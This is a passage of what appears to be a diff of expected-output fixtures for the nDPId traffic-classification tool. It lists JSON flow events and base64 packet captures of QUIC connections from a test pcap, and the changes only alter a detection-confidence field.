RpvlvWmmPwbhgJJtJv\/M89mXfU1kK+Y5ZzDEOWJFwuGE5EwyEXLqfAhuVfYr\/IGf\/dVORQAeJN2Jps3sJhqhEj1IkKjkFBWkkAkONz+gchb05T6MlwCM8C28gRq7Mb7CFBEn\/vYYqlEKnhwzKBeeBye41Vq0gbKM0JV9qRHQ7XKOsVwyIutepBP8jrECNHdwLaIEu+1zVrAN6yVIQ8\/oQq+VsbKPG9+CxCgvT5uKndWjk\/3klEO2lVttmkusFyP5l9gzCYwVOHLBsZ3xnkE2+m\/prV\/JheISUApwdWrKMEd\/078e9MXRkuX+dpNqT7a5dhlSXsO74abB1mrlTL2UcA2ek91eefqFvbEgNjkLzRgECot8CV3+VilYqrujsR+JjJ9wVO2ZRWW2y3ztaE6g21zSYVB6vxMaqYRnz72pD5b35k\/u8uTGE1pcJQr7C2oDFyU6xrQ8fc2olGaloqsNSa9zjm3tw\/aIkxpxphv2ISYW1zYIojgj\/1VCqJN2qkuGsMNJgJdPcqF3OzluCuyf9tY53umRYC\/2FFOugDxVHFd6F4iSNEQ3C3zvrpOLrWtwhbX3hkwUWpwIKllXL2Nq\/iK0AdLu5a1u7VIasXJSlmcKgX7VPPNflgTztWI0n6bh20EyUV6JmwylfymR7pRszlj27nJphDjd5FGRwMS2WMwNFJTxb+RT\/9S6rDmaFhFtes\/+ACWdpqhAKM5grfBOdhgmSQbu4voAVj9LPSU108aYASzXKDjwCDNx50fbMcWjuukzLgNuVnkky2tdFq8pWWnhoc+x1nhhOmxTLo9PFGk31LiQUA895pzmo+l2fTL008oeWJdzMT6HnN4Sq93hT2"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"optimizationguide-pa.googleapis.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"optimizationguide-pa.googleapis.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1621432925103,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432925103,"pkt":"AAAAAAAAAAcAGj1jCABFAAViSZ9AAEAR2GnAqP4Lq7apF9WkAbsFTr9ryP8AAB0ImNfkZtNfpzsAAEU0Oj9RSuVXGBshDZ9GPJVbTKah5lq0FbzrD\/4QiXWxZYgS+EbUjCGL\/0WPsAmbxAc5pHPcwM09LAtmsRF0tGX2IcJO0mU4AICaJurVtqH6l7QnkS2mp\/1x4GkbuWDqNzt1vSNWb0duDucAhmzcDliKJUl+FhynNOZYpa37\/x3qQ2gUckEGtff22WZgICjdslGI9otsFCSq641M3T\/cnDTUDnywq\/5JBllUmTz3xSy7uOqdk\/GvmAxiKHI2qstlN50jgygWTjcEwibzi9GX45hbp55CvW6Vq07\/s78mWZPUaJolO7wmVEZvMjkKJwShrqatA1+fXdYi3Cg6UroeArW9\/giXBCgKk96t0LWj0Ye3aYHEguEIQQk+U1hIhhohBG7CyRY7KinfzxhHKYp4nxR0AoE08flCIJk27BdQVKCtwgdl1KEE6InkS58vcYsqRwl5mGQOqcdrW5vFut3SDANgBea80xgfodgrDqKTbcyZffoEiF+kb9ynHc1ezv0bIAV1PkzOj2qgqWsC5p\/fh\/Zzo8P2XZ8aLnTStcZ6bcklAv5uVNf+UFbiWmjv2tlpO14A6WkHj4ErxqRWGBEYotaldzMPFZWFiW2ioPVB0TG8QGhc95U+YN9bqrlIpzSi25dwaSTySv9VHstq4bM\/QvcvcMc0fH6fkzreAswa30NHgKmTHo6vyNHpVpxUy9B4ic+Or+cxEht9\/+WUAlkGWn97Q8YWdYVqIOE5mCXUm8qnxVNMIjkIhZGSoo3YxRavD7wdS8Fw1e+q3qydgTwhWjN0NEBx48heIuNQeY\/cE2hG6X8ielA1D3F3K53XZj+sSIoJGcY1F7o1jjWVmH8mOKr2btDy1dXnct+R\/pl4MyRkLClPx\/3ATniC4oYp8uNJ3B+NZdFcYjik5Sgeyx0mQaYCG27z65uob1zsx3rLGilfcXu8rawpdMaheJzkzO8EfJ0bPQG7F16gqR72nPqhJazpLH1wJnmzKMRebRRXMjGts\/Ri1mopASMG\/jbemX2+HOVqkYrPOJB4f5ST2JWfYMS9SdThVwfLGD1AwfsTLiumDKXR4Tg9xxWgAm+qvsbkRhOZ+FGfeL1PYau3Gyz7MiuqmvjBLY1U2K2xhSPscA4eL02HE+xDEr9eGwsucUqbbX+fy7xw+w59I9WXHzL9SjWsk7akH4tDqV3vDDFTrKT11Jy1Do1G\/mkcndHjXnmmMLfPsi8aPVfXNZIsbgrEqHINxT2H5oY4DI9on9u1XyO+WEYlRBbCj0\/iK09jSPGirK8Q36Lbin8pAshKEXfyzFJHclT4mOY4c7REOe77o1hD3cLQLCZ3KJ7lzwhO1fZz\/+5qiqK9KNuq+3D1\/Fbs5GLW+FqzDspdA+DHD3HVyqhGJSXI53Ms9iSliE6F6FFbgCwH3eJT9Ox0wN1zEmBqIR7303kSG5qzr5TLI3S+HsomuNljUiJcLhPennjdx7lzykZLApkNqdXohn6cMLNWawEq2vbg6QuuGD5qyFkpNZTZlU8uAHtpVJ6PR8rOhIURj1C7nmD2CZtZldkk7jy284c\/v0cTFyeXTlazrNC5FguNM8mQtfcjJeoRBgpM91eZLLODlcjL1P9tpCLmn9Socs7Q01T2rkvjPV0716n64nRa49vunAqoY5G0f+iJstXQKjrKL1O19hveBusaLAMf3k7esjVnHjtEFlZNWENT0AHE9vZ45PqMxHl97AMxGE1Ey++DiK2nswhT1oOP5K+MSP8LTUT8gmGcQuDngWuHVMtTenYrRPM5"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.freearabianporn.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.freearabianporn.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1621433005013,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433005013,"pkt":"AAAAAAAAAAcAsxf\/CABFAAVil6tAAEARnbXAqP4LqE6ZJ4k0AbsFThpVwP8AAB0IZRm3OuXdodgAAEU0ssTnI2C5JTpJ7y484Fn11oOKDy1JlfEyAX6Ahkv2Zo4OuAkEIohPGoaBHToYLM+P+WJUX+\/Cx7tkDHSXu6uphHZEOGBHmbdUhEa31U3TrNufu9mq6Qj3es8x44mT60\/f25coknN4f1asGblw6iEV1UtSpKMZaOs\/Xn05i9jEBkmhLNqDiktkJ4wwKu6eDxhG6VfLGYQN0Nd18mF97QnMWVWto+p42IfXZbxYSsRmanu+ilVlO+oFCT5a\/R9Dt+6n3rqrFuIxLqTN6rjt10GoO\/\/lvMLrXeyHTYVfDmtLHFSomxcrpQ3r6eIc\/i4bL2wJjBHSTqeCFHn34cWF\/KUdra327rirXnBA\/7qtlzjYwUqqXpMeU06gm6+dAJeS+a55i\/iSqTqtrz20+u7ZIKLbJOhNJP6eJyDr4dCdENdXp1Fo+RvNoazaCsibyYSNV21GcFTzdJdaAp+DcgmVuOqynNS+9YRbKxw\/5tALw7bDdUy189V3QJUm\/7eodDeLzAxTU0ecTeCtBoRV6Wg00hEmo77VajiQh+S9i4nbzRbAGk3ddKNqZC3nSakSP6Mm39WZ9XZ2DSCUBtbOz1EnZK6eDSyw3kFY8N3QSNiaiSeJfa33Sokfyq3JCk8UnjuMqQyCqe2oeMj9pjHd8z5tFKOU+7OZzkA\/yQ7JVv9cFs9+5eYZ4cKFz9UVTSQT0XDPHR4RXhdh+bwJsc9s3QG7laDs6sjDff1OOdIw+HQvW4J9j4BHeEjv5EX8iWWHhElmMuawXMu41RoYajwI8TvfiJwokixmW4yjJof50jF95ax2qGzCJFu+R9a+5BttXBh\/HgnlXdP0TqNiuxyOJzh2lYvo4XC+o1iVVoZbKKo29cl1g0ROFSenQ6plougEal5XbLsvgz1yDGwthS+cZxXIzwxF8Eg5YJQAhTRX61XoObnpc3wjyuzhjohKkihqglhF+YzQsZk375xH7l8SvAlGAlhbaqyzvg5BgzZRh6okkrQOneu5ObvEyajk7xJ1B4hskZiOxnZ0noPwZBTF2QPMuYYm+MCxH46tot+xZ66piECmxmki024ptldWuOatYmRe+vTjmyyX1YPL4JCVDC40p742+pLSe\/iwjJkZAnjQmTnvKGie\/1BU5Wr+49RbkkhlQj87GarVPAL2uWWkqFe2Xngd1FbJvcDFFkuK1dxqsHpPZkmRC96zjmBFDteeGuqwR2lMo3UjjF2OCNSmVipO+iUOCkltuf8TJWxs7tEHUrqAVXcOfh5I8BPOIikZ3dfkJLmZ2FbI0TTtjsGhNskYmpIQ0PlvPIV7kAS3z0gwBKaF1FnV\/xQ0OCEM7TJqhVOfiW\/+wkoA3mujBfVH\/wOmSvWqW48vFIffH3djYRV7X32psbHY61g0HRIXjeXvXr8Qqc6kOM7tKBgVpXPFeJ07yr5RtFibyMmbpJubKIOxOd2PNf\/UyTLqOCr\/EZQqRA34kT\/VbsSrwcgR6YhLifHRelRWGH\/E0Pa9ov+0yS6KH5C1eU4IuTLa8OWBrTOYGLQu8Tu0ZuJyhcfyGs1ESpNH7K8z9wJSLmfAfovUdPKdJaXA4eVpJ3b6rEyriccdcLge1eKHdQyp3T\/AsTnrrAUQoHmrYyzAM8GsuQbvKlbfByymbHOPuwfI9YUmrFGuBKrB3X9vWARNEbMs2uicMz1oh0SQfb2Ug93LkY\/XDhxl6y6ruCuCMjHk9YF6+XgKvBLgShKGnzgcDJqqw32S355No+iSbZZxAos\/DatV1Zsga3TJckyQKORE"} -00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"s-img.adskeeper.co.uk","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"s-img.adskeeper.co.uk","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1621433005304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433005304,"pkt":"AAAAAAAAAAcAsxf\/CABFAAVil6xAAEARnbTAqP4LqE6ZJ4k0AbsFTtY8xP8AAB0IZRm3OuXdodgAAEU0cISfGNFL6Nfe8IXrcMcB0WwE+45y84o5jFkQ+EdHDqq0hRKmpjiqPPzi8JXkbGCFDae5uvRs2ByaSWejf137f0JY1fl3AeVjkq6PaQWDhduni\/8xLvtEbqFj4AqrhXB9TLrxV5LvP+0mGlJValwLeXYCkQ1e94uqm\/qbFL9zYlqDWYM9BIIViTH9xhJud\/SLw5JuUvIFaOQAu8OmZpUxq1bUd8xSmpOSKiHypmGgb39a7H+T1KVpPR+aUixKS4GeMMK2PAyd+OEGJMuz6qZJGatj+7v0DncaR5EgoSYycOF\/vja\/rdaJ\/YdRvp+BmrQNiM9k5UwjpTPFz+b8892Qzvimnfslx7R8GKQ9PAsv\/Tg24GHiB5jPl\/cYxqB7qj\/Z4RDwUJUIkT1A6um69Kq3NVgu5rAWDw3wRgcQ30gaG3co1yGCHL7BlNpgYFxtc2sG95hPofeQcZ7RmqBI8vbZsdcgEG9pwZXnghf+i9JkdOOyHhmNzU7FhBVpm886Oc7ESE5xd3wpyFyKJ5wKdEwsRtMCPYdLRf0ABAJjDpcG31xcGIVXa+iXmHdKqZaaFXdkzl+G5GyXaENB\/bBYFVR+uzivE3jfVyYnP5o6mkMgHmF4stkzuFXNhTUCQtT+vOWJOY0OKBIRfSRrLMayp1BWBk48bLyItA0l5w22EpO2xW\/My4wjTeC8gEVd09+5dNMt6iJUTON1ZAqvZHzSmdehef4+4mQl\/8x7+EsRKAIMAJ0j+\/iccKVsAFRvylLUI9xTbdrbwMgSdNlLvjtGyuPM+WW8Sz0Fphz5qliTbHpDUhw2MYDjzqo8p1eq2A8b9Wtx0Fg9PeEdOHEHN6JR93qNQ8Qm\/Zs+yaxclMgzfrz0njPpBZWm5TuoqFpmRrNgNmlZsI4vJE5izzoxbqOc+XwyaqSy74943ljvUMQ\/ZeoktJ4guJVMIv881KZyYNXdWP8XlvelQTRxmIHmrk8WULu5C89ykKYnsXobDBaYsX50pAVggD11aUXtJrh1N\/dVOKdnYucGb7Q5ArZbw6g65fAovdJY61FZZYMTsGeir2LCxh1AxApj3NMBJNeCfN35DoXwcNt+D8w2\/aSTQe6Lgqdlrl17h5TVhrBdY2EwKzbkiScpw58VyUeZdOFiVtIYClAYFglMWlD3NA05mjWkzv1JdL5VrS3h3MfI2xs4zN3+TLmvqItkAlOxTuNKnFQ6PMzhbtiE9pIRBeo7GRWe\/s3sXYSAgTQMeTwcALlYXW1XrTrXea37yWgn6qd6pcye8lKgZfbrjRMCVrOgARQ5+uLTdXLZffiqEHvPYwWFKcJtCjG2DNK7rUYqQnnhv4Wl7a9aDSnxFpvuZBqMtbV6dwRwh3nVBQCEW8tbmselh+vdecmFi+9yIQLpr\/ttp2HjIMzaof+HymOhd7VNiP61ZWKFd35OLow7F6RAlIa\/iMODRCCPy5rCPJ8Och0DWA\/AImeyu3i34G1KgGADjIpQoQOwOKh1KxRKIqPxHA83lNc0T2MvGmebHLNWLrdwsMvVJ+OOdOddVjrpUtFqYOdTOSyKkfGy+z3ggq11AbCjGSCRIXFWOTVgFonh1\/ejWrgnzhzvTVkzsdfazaZm1Nq7y3TI1Ff7GWqkisOa2duQbw0SwQHSDsh9Bynr6GVmyLYxcmpSTtCvxHuQF4wCoYZxuD709QVdI5mDD3SUUMavLX5H44VXuJkLmJC1t\/WhlhpH2ChjFQT1wbqIPa1XxtXfyl+1hhcd+xzhaw9Y6FS3fdwXN19AFoGQ"} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005304,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005304,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1621433067725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433067725,"pkt":"AAAAAAAAAAcA4umACABFAAVi1OtAAEARtzjAqP4LdZR1HseDAbsFTtZ3zP8AAB0IpPhj4m4ZUDEAAEU0Bbm2MdfcBkbBAPPSjVV7TSr2o29Fu0JZdgmdGfjVEVdDmbG+dqC+JAbzKNxQpRoBCsz4rRvvwiop1np5APZ9Ov1gMJcSIiHQncQkBtDWz+J2o6GAqwAVkZk1FxBkffl8czPnYy8dHsU5KXYYOyBtpfhC+IT7ePszMtE7GlrZvCnH23HBzZ7GxSIxR9YFrG6h4PldhiWirrW6fHFgo\/piSndGDtWSJ+EYJdFyOMLk8LdIhNJ\/bJX3nYw329gRY5r\/poWNl5g71rBp4iz\/aiTDNDMAfcg1ExHdPviw2IK9f4W8pMDMvDI9FexzuJfBX9eRklkzssGGPyOnF+xE6997bLBbI4Vi9+gpQBFCCwYHdZ8Yt0Gussz\/f9ErkfzoPii85d0vfFh+DB5q2D4txvr1h4E4SDVIPFbk3TFJy\/7UXDNbvXXIm5xIqlq3grZZAsNicHGKes2+rw5ypULifO33QhqTPaSFb\/jQn6NyP3WJTRP9i0U0VPYsdYu3f0K5pfJOPF\/8gAxIuhKlFGtGv9GRMlzIpV1F1p2d9+\/vUuadZOiX\/Db7H96lha\/Okr2QtWcz\/SSoJEkbKYVqBS3RDAbbB4X6mN4n9Ft6hAcQJheC2GFXuEAFotpEq4XY1B+2WcU1cIEKgkoBaRv5g1\/LOKnYzLT8SzL1UVFovVGYHn+X0THvNtuJ957AYrKYcqgN\/SUJSPHzmoZoWGO\/q5y19X4WfC481zRO79sZO31h6Dk1na9B\/hYqG\/CxAXd1s5xBzDA8OS5TnaqusIzCxer4zV82fnF7VoQtDopVZNTsoDAIpt6cW+fAinlqYRRovLmToeikcLMo8c8\/6+0XN4C\/sNxwObVZ\/O5C\/emTkAyuRrduScc9vJaxAO9Dl74qqMHIMLFex8KQIDCh6G1NTs3194S8k5vVSQvmLDPRNPbXzBD1\/e\/+7+rmJqGUOcdbTOlX0fkuR4DB14HEvju2C2b9RxC4VpxeWcvtcIqUvnsdf+10RtMvVEY1H8oIRhd\/40\/JOM1RwnJAya+YM9Lojxag2aYSWUlQyopt5V+r8YPszgD2PyRsBJhXDMRUFIuIv2\/u0jmGfN1IMWtAf4wKiwoSQdAMV17hTocy61LlAkDEtIzfOpKoBNjr1FJvgoLlUR3p6HPRjORhAJzdHC7IByfP3Hxhs3ctG3V\/7BQQoSKFTrGH3kjhrfgHIt0HEkl96gVcUPsmn4EtE2VI+GcXfV\/ANkKoUFr3NCaUGtMncqVP\/YjZZJ+QcMW41L0RZUgzIT928lTjcFEypXkCRrlGtP+rWWXE7mFYXiNfnrIK3QAi4gD88L8LjTWDuvcPu8biICw9pEbLTHY1O7PpcQj\/JJ82HVYLYO58O++NchQ\/rgmiClydF0i\/JID1L1diJjMl1iYMV77lfb9Nvv2HfL8j7cDz55Alfw6pwUDnb8QeDwc\/a6xAfyz4uojy4vrCkJfYZreW9P4NFSgKnEX7HwNb6i1ZjiVei7dVFeH9afC69DsshYJ7L0fYFE5rREPVfqmcWx57T\/mQmdAf1+07k2CuNu6sNtY+XS6xOdLTWbSkcX50J5GTkvJhnKHxtmGLG8CoEfmdvM4NCU9jEGSExH87\/iWlXlfjYuUfmvFjsKZOzqUkQ2sUkhZw7BFVNd3HF7fUsilfRlk2t8MaAx\/EEndDgdYNK0EgdXbFzOIIeK6IAbpmYeX7gNdesbdzVQ6uz6TCcVrRcKuxoreJi193vTD2D8+SLe1fOItmTtr9WoqXkb1GjhybS\/sPn+TL"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 